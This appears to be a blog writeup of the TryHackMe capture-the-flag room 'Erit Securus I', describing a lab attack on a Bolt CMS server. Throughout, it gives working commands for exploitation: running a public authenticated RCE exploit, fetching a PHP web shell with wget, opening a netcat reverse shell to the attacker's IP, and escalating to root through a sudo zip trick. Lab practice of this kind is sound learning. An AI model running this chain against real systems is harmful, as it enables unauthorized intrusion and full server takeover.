This writeup is the second in my TryHackME writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes so I figured I'd write them out.
This is a writeup for Erit Securus I
nb: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.
Task 2
Per usual, we're going to start by running our nmap scan on the box to figure out which ports are open, what is running on those ports and which versions of those apps are running. We'll save all those results in a file. This gives us the answers to all of task #2.
mkdir scans
nmap -sC -sV -oN scans/nmap <IP>
Task 3 - 5
Let's take a look at the app we're going to be exploiting by opening the page in our browser. It looks like your average CMS. When we check the browser, we can see exactly which CMS it's running. From a quick google search we learn that the login page for this CMS lives under /bolt/login. We could brute force the login details for a user but that's not really what this room is for. Just guess a couple username/password combinations that would work for a very badly secured admin panel and I'm sure you'll get the right info.
We download the exploit from task #4 by running git clone https://github.com/r3m0t3nu11/Boltcms-Auth-rce-py in our project folder.
We'll open the exploit folder in our terminal by running cd Boltcms-Auth-rce-py and then we install the requirements with pip by running pip3 install -r requirements.txt.
We're now ready to run the exploit.
python3 exploit.py http://<IP> username password
After a while, the exploit allows us to start performing commands on the server. The room instructions tell you to put some PHP code into a file but I prefer to do this slightly differently. For stability, we're going to upload a shell to the server. I like to use the p0wny shell but you're free to use whatever feels good.
Let's download the php file and put it in our project folder. Then setup a python server using SimpleHTTPServer in a separate terminal window or tab:
python -m SimpleHTTPServer
Now, in the exploit window, we're going to wget our shell.php file from our python server:
wget "http://<OUR IP>:8000/shell.php"
When we visit the shell file in the /files/ folder on the web app, we get a more stable shell that allows us to perform more commands. From here, we're going to download netcat so we get a good reverse shell going. Let's make netcat available on our http server by copying it to our project folder. Run the following command in your project folder:
ln -s $(which nc) .
And then download it from the php shell and make it executable:
wget "http://<OUR IP>:8000/nc"
chmod +x ./nc
Now setup a listener on our own box:
nc -nvlp 4444
And run netcat from the shell file by sending the shell command to our own IP, then upgrade the shell so it's a beautiful bash shell:
nc -e /bin/sh <OUR IP> 4444
Congratulations, you now have a reverse shell on this server! Make sure to upgrade it once you have it, using python:
python -c 'import pty;pty.spawn("/bin/bash")'
Task 6 - 9
Task 6 is pretty straightforward if you do exactly what the room tells you to do. You can't go wrong.
For task 7 we're going to run sudo -l once we're connected to the local box using ssh. This shows us the answer to the question in task 7 and gives us valuable information on how we could possibly escalate our privileges. The format for the answer to task 7 shows us that we can execute /usr/bin/zip as the jsmith user. When we visit the gtfobin page for this file we see that we're going to be able to escalate our privileges to the jsmith user by running these commands:
TF=$(mktemp -u)
sudo -u sjmith zip $TF /etc/hosts -T -TT 'sh #'
As the jsmith user, we run the same python command to upgrade our shell and then we take another look at what we're able to do using sudo by running sudo -l.
It seems we can do literally anything we want as sudo, all without using a password so just run sudo su to escalate to root, and now you're free to do anything you want on this server.
Congratulations for finishing Erit Securus I!
Top comments (0)